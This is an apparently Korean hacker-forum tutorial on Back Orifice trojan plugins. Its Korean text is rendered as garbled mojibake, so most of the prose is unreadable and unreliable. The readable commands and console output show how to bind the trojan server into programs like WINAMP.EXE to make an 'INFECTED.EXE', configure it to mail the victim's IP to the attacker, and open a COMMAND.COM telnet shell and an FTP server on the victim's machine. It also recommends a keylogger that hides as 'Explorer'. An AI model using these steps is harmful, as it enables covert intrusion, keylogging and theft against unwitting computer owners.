BO Ä¿¸Çµå »ç¿ë¹ý
À̱ÛÀº ÇØÀûK °Ô½ÃÆÇ¿¡ °Ô½ÃµÈ seanet ´ÔÀÇ ±ÛÀÔ´Ï´Ù.
: BO Ç÷¯±×ÀÎ »ç¿ë¹ý
¹é¿À¸®Çǽº(Back Orifice) Ç÷¯±×Àο¡ ´ëÇØ Á¦°¡ ¾Ë°í Àִ°͸¸ Àû¾îº¼±î ÇÕ´Ï´Ù.
¿©±â¼ ¼³¸íÇÒ Ç÷¯±×ÀÎÀº
SILKROPE
SARANWRAP
BUTT TRUMPET
BOFTP
ÀÔ´Ï´Ù.
BUTT SNIFFER¶ó´Â ½º´ÏÆÛ Ç÷¯±×Àεµ ÀÖ½À´Ï´Ù¸¸...Á¦ °æ¿ì¿¡ Á¦ ÄÄÇ»ÅÍ¿¡
¼³Ä¡Çϰí Á¦ ÄÄÇ»ÅÍ¿¡¼ Á¢¼ÓÇϸé Á¦´ë·Î µ¿ÀÛÇÏÁö¸¸ ´Ù¸¥ ÄÄÇ»ÅÍ¿¡ ¼³Ä¡Çϰí
Á¢¼ÓÇÏ¸é ¿¬°áÀÌ µÇÁú ¾Ê´õ±º¿ä. ¾ÆÁ÷ ¹®Á¦°¡ ¹«¾ùÀÎÁö ¹ß°ßÇÏÁö ¸øÇß½À´Ï´Ù.
À̰ÍÀÇ ¼³¸íÀº ´ÙÀ½À¸·Î ¹Ì·ï¾ß°Ú±º¿ä.
±×¸®°í ¼ºñ½º·Î KEY LOGGING ÇÁ·Î±×·¥µµ Çϳª ¼Ò°³ÇÒ±î ÇÕ´Ï´Ù.
KEY LOGGING ÇÁ·Î±×·¥Àº ¸¹°íµµ ¸¹Áö¸¸ ±×Áß¿¡ Á¤¸» ¾µ¸¸ÇѰÍÀº 2-3°³¿¡
ºÒ°úÇÑ°Í °°½À´Ï´Ù. ±×Áß¿¡ LOG.EXE ¸¦ ¼Ò°³ÇØ µå¸®ÁÒ.
¸ÕÀú Ç÷¯±×ÀÎ ¼³¸íºÎÅÍ...
¢º Ç÷¯±×ÀÎ »ç¿ë¹ý
1. SILKROPE - BOSERVE.EXE¿Í ÀÓÀÇÀÇ ¼³Ä¡ÇÁ·Î±×·¥À» ÇÕÃÄÁÖ´Â Ç÷¯±×ÀÎ.
ÇÊ¿äÇÑ ÆÄÀÏ :
SILKROPE.EXE
SILKROPE.DAT
BOSERVE.EXE
ÀÓÀÇÀÇ ½ÇÇàÆÄÀÏ ¶Ç´Â ¼³Ä¡ÇÁ·Î±×·¥(EX:WINAMP.EXE,NOTEPAD.EXEµîµî)
À§ÀÇ ÇÁ·Î±×·¥µéÀÌ ¸ðµÎ °°Àº µð·ºÅ丮¿¡ ÀÖ¾î¾ß ÇÕ´Ï´Ù. ±×¸®°í ¿©±â¼
BOSERVE.EXE´Â ȯ°æ¼³Á¤À» ¹Ì¸® ÇØµÎ¾î¾ß°ÚÁÒ. ÁغñµÆÀ¸¸é µµ½ºÃ¢¿¡¼
SILKROPE.EXE¸¦ ½ÇÇàÇÕ´Ï´Ù.
C:\BO>SILKROPE.EXE
SilkRopeBind -- Bind the BO Installer to a "real" program
by Brian Enigma
BO_INSTALLER + REAL PROGRAM --> INFECTED.EXE
File name of your Back Orifice installer?[defaults to BOSERVE.EXE]
: ¿©±â¿¡ BOSERVE.EXEÀÇ ÆÄÀϸíÀ» Àû¾îÁÝ´Ï´Ù. ÆÄÀÏÀÌ BOSERVE.EXE¶ó¸é
¾ÈÀû¾îÁ൵ µÇ°ÚÁÒ.
EX>BOSERVE.EXE
File name of the "real" program to be run?
(it will not be modified in any way, only copied into INFECTED.EXE
: ¿©±â¿£ ÀÓÀÇÀÇ ½ÇÇàÆÄÀÏ ¶Ç´Â ¼³Ä¡ÇÁ·Î±×·¥ÀÇ ÆÄÀϸíÀ» Àû½À´Ï´Ù.
EX>WINAMP.EXE
±×·³ ÀÌÁ¦ µÆ½À´Ï´Ù. INFECTED.EXE¶õ ÆÄÀÏÀÌ ¹Ù·Î BOSERVE.EXE¿Í ´Ù¸¥
½ÇÇàÆÄÀÏÀ» ÇÕÄ£ ÇÁ·Î±×·¥ÀÔ´Ï´Ù. À̰ÍÀÇ À̸§À» ¿ø·¡ ½ÇÇàÆÄÀϸíÀ¸·Î ´Ù½Ã ¹Ù²ã¼
»ó
´ëÄÄÇ»ÅÍ¿¡ Áý¾î³ÖÀ¸¸é µÇ´Â°Ì´Ï´Ù.
2. SARANWRAP - SILKROPE¿Í ºñ½ÁÇÑ ¸ñÀûÀ» °¡Áø ÇÁ·Î±×·¥ÀÌ°í ´ÜÁö SILKROPE´Â
Ç÷¯±×ÀÎÀ» ½ÇÇàÆÄÀϰú ÇÕÃÄÁÖ´Â °ÍÀÌÁö¸¸ À̰ÍÀº ¼³Ä¡ÇÁ·Î±×·¥ÀÇ ÀϺÎÀΰÍó·³
À§Àå½ÃÄÑÁÖ´Â Ç÷¯±×ÀÎÀÔ´Ï´Ù.
ÇÊ¿äÇÑ ÆÄÀÏ :
SARANWRAP.EXE
BOSERVE.EXE
ÀÓÀÇÀÇ ½ÇÇàÆÄÀÏ ¶Ç´Â ¼³Ä¡ÇÁ·Î±×·¥(EX:WINAMP.EXE,NOTEPAD.EXEµîµî)
À§ÀÇ ¼¼ ÆÄÀÏÀÌ °°Àº µð·ºÅ丮¿¡ ÀÖ¾î¾ß ÇÑ´Ù. Áغñ°¡ µÆÀ¸¸é ´ÙÀ½°ú °°ÀÌ ÇÑ´Ù.
¨ç ¸ÕÀú BOSERVE.EXE¸¦ DATA1.Z ·Î À̸§À» ¹Ù²Û´Ù.
¨è ÀÓÀÇÀÇ ½ÇÇàÆÄÀÏ(EX:WINAMP.EXE, NOTEPAD.EXEµî)ÀÇ À̸§À» DATA2.Z ·Î
¹Ù²Û´Ù.
¨é SARANWRAP.EXEÀÇ À̸§À» 2¹øÀÇ ¿ø·¡ ½ÇÇàÆÄÀÏÀÇ À̸§À¸·Î ¹Ù²Û´Ù.
- 2¹ø¿¡¼ ½ÇÇàÆÄÀÏÀÌ WINAMP.EXE¿´´Ù¸é SARANWRAP.EXE¸¦ WINAMP.EXE·Î
À̸§À» ¹Ù²Û´Ù.
ÀÌ·¸°Ô À̸§À» ¹Ù²Û ¼¼ ÆÄÀÏÀ» ¾ÐÃàÇØ¼ ¼³Ä¡ÇÁ·Î±×·¥ÀÎô ´©±º°¡¿¡°Ô ÀüÇØÁÖ¸é
ÀÏÀº ³¡³ª°ÚÁÒ.
3. BUTT TRUMPET - BOSERVE.EXE°¡ »ó´ëÄÄ¿¡ ¼³Ä¡µÈ´Ù°í ÇØµµ ±× ÄÄÇ»ÅÍÀÇ
IP ¾îµå·¹½º¸¦ ¸ð¸£¸é ¼Ò¿ëÀÌ ¾øÁÒ. ÀÌ BUTT TRUMPET Ç÷¯±×ÀÎÀ» »ç¿ëÇϸé
BOSERVE.EXE°¡ ¼³Ä¡µÈ ÄÄÇ»ÅÍÀÇ IP¾îµå·¹½º¸¦ ¸ÞÀÏ·Î È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù.
ÇÊ¿äÇÑ ÆÄÀÏ :
BOSERVE.EXE
BOCONFIG.EXE
BT.DLL - BUTT TRUMPET Ç÷¯±×ÀÎ ÆÄÀÏÀÔ´Ï´Ù.
±×·³ µµ½ºÃ¢À¸·Î ³ª°¡¼ ´ÙÀ½ ¼ø¼´ë·Î ÇϽñ⠹ٶø´Ï´Ù.
c:\bo>boconfig.exe boserve.exe
BOConfig 1.0 - Configures execution options for a Back Orifice server
Runtime executable name: (does not necessarily have to end in .exe)
- boserve.exe°¡ »ó´ëÄÄ¿¡ ¼³Ä¡µÉ¶§ÀÇ ÆÄÀÏÀ̸§À» Àû½À´Ï´Ù µðÆúÆ®´Â .exe
ex)server.exe
Exe description in registry:
- ·¹Áö½ºÆ®¸®¿¡ µî·ÏµÉ ¼³¸íÀ» Àû¾îÁÝ´Ï´Ù...¾Æ¹«°Å³ª...
ex)BackOrifice
Server port:
- Æ÷Æ®³Ñ¹ö¸¦ ÁöÁ¤ÇØ ÁÝ´Ï´Ù. µðÆúÆ®´Â 31337(±ÇÀå)
ex)31337
Encryption password:
- Àڱ⸸ÀÇ ¾ÏÈ£¸¦ ¼³Á¤ÇÕ´Ï´Ù. ¾ÏÈ£¸¦ ¼³Á¤ÇÏÁö ¾ÊÀ¸¸é ´©±¸³ª ´Ù ¾µ¼ö ÀÖ°ÚÁÒ.
¾ÈÀû¾îµÎ µË´Ï´Ù.
ex)pass
Default plugin to run on startup:
-¿©±â¼ºÎÅÍ Ç÷¯±×ÀÎ(¿©±â¼´Â bt.dll)À» ¼³Á¤ÇØÁÝ´Ï´Ù.
ex)bt.dll:_start
Arguments for plugin:
- Ç÷¯±×ÀÎÀÇ ÆÄ¶ó¹ÌÅ͸¦ ¼³Á¤ÇÕ´Ï´Ù. BT¿¡¼´Â ¸ÞÀÏÁÖ¼Ò¸¦ Àû¾îÁִµ¥¿Í ¶È°°Àº
Çü½Ä
À¸·Î ÁöÁ¤ÇØÁà¾ß ÇÕ´Ï´Ù.
ex)mail.hotmail.com,[email protected]
------------------------ ¦¡¦¡¦¡¦¡¦¨¦¡¦¡¦¡¦¡¦¡¦¡
¦¢
¦¦¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡
À̸ÞÀÏ ÁÖ¼ÒÀÔ´Ï´Ù.
¦¢
¦¦¦¡¦¡¦¡
¸ÞÀϼ¹öÀÇ ÁÖ¼Ò¸¦ Àû½À´Ï´Ù...À̶§ hotmail.com °ú °°Àº
À¥¸ÞÀϼ¹ö´Â SMTP¸¦ Áö¿øÇØÁÖÁö ¾Ê±â ¶§¹®¿¡ À§ÀÇ ¿¹Ã³·³ mail.hotmail.comÀ̶ó°í
¾Õ
¿¡ mailÀ» Àû¾îÁà¾ß µË´Ï´Ù. ( ¸ÞÀϼ¹ö¿Í À̸ÞÀÏÁÖ¼Ò´Â ÄÞ¸¶(,)·Î ±¸ºÐ)
File attach:
- boserve.exe¿¡ ÇÕÃÄÁú Ç÷¯±×ÀÎ ÆÄÀÏ(¿©±â¼± bt.dll)À» Àû¾îÁÝ´Ï´Ù.
ex)bt.dll
Write file as:
- Ç÷¯±×ÀÎ ÆÄÀÏÀÌ ÇÕÁ®Áú ÆÄÀÏ...´ç¿¬È÷ boserve.exe°¡ µÇ°ÚÁÒ.
ex)boserve.exe
ÀÚ ±×·³ ´Ù µÆ½À´Ï´Ù.
¼³Á¤ÀÌ ³¡³µÚÀÇ boserve.exeÀÇ ÆÄÀÏÅ©±â´Â ¾à 180k¹ÙÀÌÆ®Á¤µµ µÉ°Ì´Ï´Ù.
ÀÌ ÆÄÀÏÀÌ ³×Æ®¿÷°¡´ÉÇÑ ÄÄÇ»ÅÍ¿¡ ¼³Ä¡µÇ¸é ±× ÄÄÇ»ÅͰ¡ ´ÙÀ½ ºÎÆÃÇÒ¶§ À§¿¡¼
ÁöÁ¤ÇÑ ¸ÞÀÏ ÁÖ¼Ò·Î IP¿Í ÄÄÇ»ÅÍÀ̸§µîÀ» ´ÙÀ½°ú °°ÀÌ ¸ÞÀÏ·Î º¸³»ÁÖ°Ô µË´Ï´Ù.
Hello,
My address is:
xxx.xxx.xxx.xxx
(¼¹öÀ̸§.¼¹öÀÇ µµ¸ÞÀγ×ÀÓ::ÄÄÇ»ÅÍÀ̸§)
±×¸®°í ¶ÇÇϳª ¸»¾¸µå¸°´Ù¸é ¹«ÀÛÀ§·Î BO°¡ ¼³Ä¡µÈ ÄÄÇ»Å͸¦ ½ºÀ§ÇÎÀ¸·Î ã°íÀÚ
ÇÒ¶§ ±× ¼ö¸¹Àº IPÀÇ ¼ºê³ÝÀ» ´Ù µÚÁø´Ù´Â°Ç ÂüÀ¸·Î °í¿ªÀÌÁÒ.
´ëÃæ ISPÀÇ ¼ºê³Ý¸¸ ¾Ë¾Æµµ ÁÁÀ»ÅÙµ¥ ¸»ÀÌÁÒ. Á¦ °æ¿ì IRC¸¦ ÅëÇØ¼ ¼ºê³ÝÀ» ¾Ë¾Æ³»
´Âµ¥¿ä. IRCÀÇ °æ¿ì /dns nickÇÏ¸é »ó´ëÀÇ IP°¡ ³ª¿É´Ï´Ù. ±×·³ ±× IPÀÇ ¼ºê³ÝÀ»
°Ë
»öÇØº¸¸é µÇ°ÚÁÒ. ÀÌ·¸°Ô IP¸¦ °Ë»öÇØÁÖ´Â ½ºÅ©¸³Æ®°¡ ÀÌ¹Ì ³ª¿Í ÀÖ½À´Ï´Ù. rIP.ini¶ó
°í
Á» ã¾Æº¸½Ã¸é ½±°Ô ³ª¿Ã°Ì´Ï´Ù. À̰ɷΠ½ºÀ§ÇÁ¸®½ºÆ®¸¦ ¸¸µé¾î¼ BO¿¡¼ °Ë»öÇϸé
ÆíÇÏ°Ô Ã£À» ¼ö ÀÖ°ÚÁÒ.
4. BOFTP - BOSERVE.EXE °¡ ¼³Ä¡µÈ ÄÄÇ»Å͸¦ FTP¼¹ö·Î ¸¸µé¾îÁÖ´Â Ç÷¯±×ÀÎ
ÀÔ´Ï´Ù.
BOGUI¸¸À¸·Î ¿ø°ÝÁö ÆÄÀÏÀ» °ü¸®ÇÏ´Â°Ç ºÒÆíÇϱ⠱×Áö¾øÁö¿ä. HTTP¸¦ ÀÌ¿ëÇØ¼
ÆÄÀÏÀ» ÁÖ°í ¹ÞÀ» ¼öµµ ÀÖÁö¸¸ ÆÄÀÏÁÖ°í¹Þ´Â°Å¾ß FTP°¡ ´õ ÆíÇÏ°Ô ¸¶·ÃÀÌÁÒ.
BOFTPÀÇ DLL.EXEÆÄÀÏÀ» ½ÇÇàÇØº¸¸é SERVE-U ÇÁ·Î±×·¥ÀÌ ³ª¿É´Ï´Ù. ±×·¯´Ï
À̰ÍÀº SERVE-U ¸¦ ÀÌ¿ëÇØ¼ FTP¼¹ö·Î ¸¸µé¾îÁØ´Ù´Â°É ¾Ë¼ö ÀÖÁÒ.
ÀÌ Ç÷¯±×ÀÎÀº ¿ø°ÝÁö(BOSERVE.EXE°¡ ¼³Ä¡µÈ ÄÄÇ»ÅÍ)¿¡¼ ¼³Ä¡ÇØ¾ß Çϸç
¹Ýµå½Ã C:\·çÆ®¿¡¼ ½ÇÇàµÇ¾ß ÇÕ´Ï´Ù.
ÇÊ¿äÇÑ ÆÄÀÏ :
DLL.EXE - BOFTP.ZIP À» Ç®¸é ³ª¿É´Ï´Ù.
¼³Ä¡¹ý :
¨ç ¸ÕÀú BOSERVE.EXE°¡ ¼³Ä¡µÈ ÄÄÇ»Å͸¦ ã¾Æ¾ßÁÒ...
¨è BOSERVE.EXE°¡ ¼³Ä¡µÈ ÄÄÇ»Å͸¦ ã¾ÒÀ¸¸é BOŬ¶óÀ̾ðÆ®(BOGUI,BOCLIENT)·Î
HTTP¸í·ÉÀ» ½á¼ »ó´ëÄÄÀ» HTTP ¼¹ö·Î ¸¸µì´Ï´Ù.
(HTTP ¸í·É¿¡´Â ÆÄ¶ó¹ÌÅͰ¡ 2°³(Æ÷Æ®¹øÈ£, ·çÆ®)ÇÊ¿äÇÏ´Ù°í µÇ¾îÀÖÁö¸¸ ·çÆ®
ÆÄ¶ó¹ÌÅÍ´Â °ø¶õÀ¸·Î µÎ°í Æ÷Æ®¹øÈ£¸¸ Àû¾î¼ ½ÇÇàÇϼ¼¿ä. ·çÆ®¸¦ Àû¾îÁÖ¸é ±×
µð·ºÅ丮¸¸ Ȱ¼ºÈ µÇ¾î¼ ±× ¾ÈÀÇ ÆÄÀÏÀ̳ª µð·ºÅ丮´Â ¾ï¼¼½º ÇÒ ¼ö ¾ø½À´Ï´Ù.)
¨é À¥ºê¶ó¿ìÀú¸¦ ½ÇÇàÇØ¼ ÁÖ¼Ò¶õ¿¡ "http://»ó´ëÄÄÇ»ÅÍ IP:Æ÷Æ®¹øÈ£"
¸¦ Àû°í Á¢¼Ó
ÇÕ´Ï´Ù.
EX) http://xxx.xxx.xxx.xxx:80 - Æ÷Æ®¹øÈ£¸¦ 80À¸·Î ÇßÀ»¶§
¨ê Á¢¼Ó¿¡ ¼º°øÇÏ¸é »ó´ëÄÄÇ»ÅÍÀÇ Á¢±Ù°¡´ÉÇÑ ¸ðµç µå¶óÀÌºê ¹®ÀÚ°¡ ³ª¿Ã°Ì´Ï´Ù.
¿©±â¼ C:\ ·Î µé¾î°©´Ï´Ù.
(ÁÖ¼Ò¸¦ ÀûÀ»¶§ "http://xxx.xxx.xxx.xxx:80/C:\" ¶ó°í ¾²¸é ¹Ù·Î Cµå¶óÀ̺ê·Î
Á¢¼ÓµË´Ï´Ù.)
¨ë C µå¶óÀ̺꿡 Á¢¼ÓÇϸé È¸é ¸Ç ¾Æ·¡¿¡ ÆÄÀÏÀ» ¾÷·Îµå ÇÒ¼ö ÀÖµµ·Ï µÇ¾î ÀÖ½À´Ï´Ù.
¿©±â¼ ÆÄÀÏÀ» À§ÀÇ DLL.EXE¸¦ ¼±ÅÃÇØ¼ ¿ÞÂÊÀÇ ¾÷·Îµå ¹öưÀ» ´©¸¨´Ï´Ù.
¨ì ±×·³ ¾÷·Îµå ÇÏ´Â µ¿¾È¿¡ ´Ù½Ã BOŬ¶óÀÌ¾ðÆ®·Î APP ADD ¸í·ÉÀ¸·Î »ó´ëÄÄ¿¡
COMMAND.COMÀ» ½ÇÇàÇÕ´Ï´Ù. ÅÚ³ÝÀ¸·Î Á¢¼ÓÇϱâ À§ÇؼÁÒ.
½ÇÇàÇÏ´Â ¹æ¹ýÀº ù¹øÂ° ÆÄ¶ó¹ÌÅÍ¿¡´Â COMMAND.COMÀ» ¾²°í µÎ¹øÂ° ÆÄ¶ó¹ÌÅÍ¿¡
´Â Æ÷Æ®¹øÈ£¸¦ Àû½À´Ï´Ù. À̶§ À§ÀÇ HTTP¸í·ÉÀ» ¾µ¶§ÀÇ Æ÷Æ®¹øÈ£¸¦ Á¦¿ÜÇÑ ¹øÈ£¸¦
½á¾ß°ÚÁÒ.
EX)BOCLIENT.EXE»ç¿ë½Ã(Æ÷Æ®¹øÈ£¸¦ 23À¸·Î ÇÒ¶§)
APPADD COMMAND.COM 23
¨í Àû´çÇÑ ÅÚ³ÝÇÁ·Î±×·¥(À©µµ±âº»Åڳݵµ ÁÁ°í À̾߱⳪ µ¥ÀÌŸ¸Çµµ ÁÁ½À´Ï´Ù.)À»
½ÇÇà
ÇØ¼ »ó´ëÄÄÇ»ÅÍÀÇ IPÁּҷΠȣ½ºÆ®¸¦ Ãß°¡ÇÕ´Ï´Ù. (µ¥ÀÌŸ¸Ç¿¡¼´Â Á¢¼Ó¸ñ·ÏÀÌÁÒ..
À̾߱â´Â ÀüȹøÈ£ºÎÀΰ¡...)
¨î ÀÌÁ¦ ±× ¹øÈ£·Î Á¢¼ÓÇÏ¸é »ó´ëÄÄ¿¡ ÅÚ³ÝÀ¸·Î Á¢¼ÓÇÏ°Ô µÈ°Ì´Ï´Ù. ÇØº¸½Ã¸é
¾Æ½Ã°Ú
Áö¸¸ »ó´ëÄÄÀÇ 23¹ø Æ÷Æ®¿¡¼´Â Áö±Ý COMMAND.COMÀÌ µ¿ÀÛÇϰí ÀÖÀ¸¹Ç·Î Á¢¼Ó
Çϸé À©µµ µµ½ºÃ¢À» ½ÇÇàÇÒ¶§¿Í °°ÀÌ Åڳݿ¡ Ç¥½Ã°¡ µË´Ï´Ù. ¿©±â¼´Â µµ½º ±âº»
¸í·É¸¸ µ¿ÀÛÇÏ°Ô µË´Ï´Ù.
¨ï ÀÚ...ÀÌÁ¦ ¨ë¹ø¿¡¼ÀÇ DLL.EXEÀÇ Àü¼ÛÀÌ ³¡³µÀ¸¸é ÅÚ³ÝÀ¸·Î DIR¸í·ÉÀ» ³»·Áº¾´Ï´Ù.
¾Æ¸¶ C:\¿¡ DLL.EXEÆÄÀÏÀÌ ÀÖÀ»°Ì´Ï´Ù.
¨ð ÀÌÁ¦ DLL.EXE ÆÄÀÏÀ» ½ÇÇàÇÕ´Ï´Ù. À̰ÍÀº ÀÚµ¿Ç®¸²ÆÄÀÏ·Î ½ÇÇàÇÏ¸é ¸î°³ÀÇ
ÆÄÀÏÀÌ
³ª¿Ã°Ì´Ï´Ù.
¨ñ ¸¶Áö¸·ÀÔ´Ï´Ù. DLL.EXE ¸¦ ½ÇÇàÇØ¼ »ý±ä ÆÄÀÏÁß¿¡ 1.BATÆÄÀÏÀ» ½ÇÇàÇÕ´Ï´Ù.
ÀÚµ¿À¸·Î FTP¸¦ ¼³Ä¡Çϸç DLL.EXE ÆÄÀϰú ±×¿¡ ÀÇÇØ »ý±ä ÆÄÀϵµ ¾Ë¾Æ¼ Áö¿öÁֹǷÎ
ÈçÀûÀº ³²Áö ¾ÊÀ» °ÍÀÔ´Ï´Ù.
ÀÌÁ¦ ´Ù µÆÀ¸´Ï FTP ÇÁ·Î±×·¥À¸·Î Á¢¼ÓÇÏ¸é µÇ°ÚÁÒ... À̹ø¿¡´Â ¼³¸íÀÌ ³Ê¹« ÀåȲÇß±º
¿ä...Èì...-_-
5. KEY LOGGING ÇÁ·Î±×·¥
KEY LOGGING ÇÁ·Î±×·¥À¸·Î ¾µ¸¸ÇÑ °ÍÀ¸·Î´Â KEYLOGER97(¶Ç´Â IK97)°ú LOG.EXE
(¶Ç´Â KEYLOG98)ÀÌ ÀÖ½À´Ï´Ù. ÇÏÁö¸¸ ¾ÕÀÇ IK97Àº ¼³Ä¡ÇÁ·Î±×·¥ÀÌ ÀÖ¾î¼ ¼³Ä¡°úÁ¤À»
°ÅÃÄ¾ß ÇÏ´Ï »ó´ëÄÄ¿¡ ¼³Ä¡ÇϰíÀÚ ÇÏ¸é ±×¸²ÀÇ ¶±ÀÌÁÒ. ÇÏÁö¸¸ LOG.EXE´Â ¼³Ä¡°úÁ¤µµ
ÇÊ¿ä¾øÀ¸´Ï ¸¸¾à »ó´ë°¡ ¸ð¸£°Ô ÇÏ°í ½Í´Ù¸é LOG.EXE°¡ ´Ü¿¬ Ãßõ°¨ÀÌÁÒ.
LOG.EXE´Â ÀÏ´Ü Çѹø ½ÇÇàµÇ¸é ±× ´ÙÀ½ºÎÅÏ ºÎÆÃ½Ã¿¡ ÀÚµ¿À¸·Î ½ÇÇàµË´Ï´Ù.
(¹°·Ð IK97µµ ±×·¸±ä ÇÏÁö¸¸...)
±×¸®°í LOG.EXE´Â CTRL-ALT-DELÀ» ´©¸£¸é ³ª¿À´Â ÀÛ¾÷°ü¸®Ã¢(?)¿¡ ExplorerÀ̶ó°í
Ç¥½ÃµË´Ï´Ù.
¹Ý¸é IK97Àº ik97À̶ó°í Ç¥½ÃµÇÁÒ.
IK 97µµ ±×·¸Áö¸¸ LOG.EXEµµ ¼³¸íÀÌ ÇÊ¿ä¾ø½À´Ï´Ù.
±×Àú HTTP·Îµç FTP·Îµç »ó´ëÄÄÇ»ÅÍ¿¡ Àü¼ÛÇØ¼ ±×Àú LOG.EXE¸¸ ½ÇÇàÇÏ¸é µÇ´Ï±î...
ÅÚ³ÝÀ¸·Î ½ÇÇàÇÏ¸é µÇ°ÚÁÒ? µÇµµ·ÏÀÌ¸é µð·ºÅ丮 ±í¼÷ÇÑ °÷¿¡ º¹»çÇϼž߰ÚÁÒ.
»ó´ë°¡ ¸ð¸£°Ô ÇÒ·Á¸é...
·Î±ëµÈ ÆÄÀÏÀº C:\WINDOWS\SYSTEM µð·ºÅ丮 ¾È¿¡ '97X' ¶õ µð·ºÅ丮°¡ »ý±â°í
±×¾È¿¡ ÀúÀåµË´Ï´Ù.
ÀÚ...ºÎµð À§¿¡ ¸»¾¸µå¸° ¿©·¯°¡ÁöµéÀ» ¾Ç¿ëÇÏÁö ¸¶½Ã±â ¹Ù¶ó°í ¶Ç ÀÚ±â Àڽŵµ
Á¶½ÉÇϽñ⠹ٶø´Ï´Ù.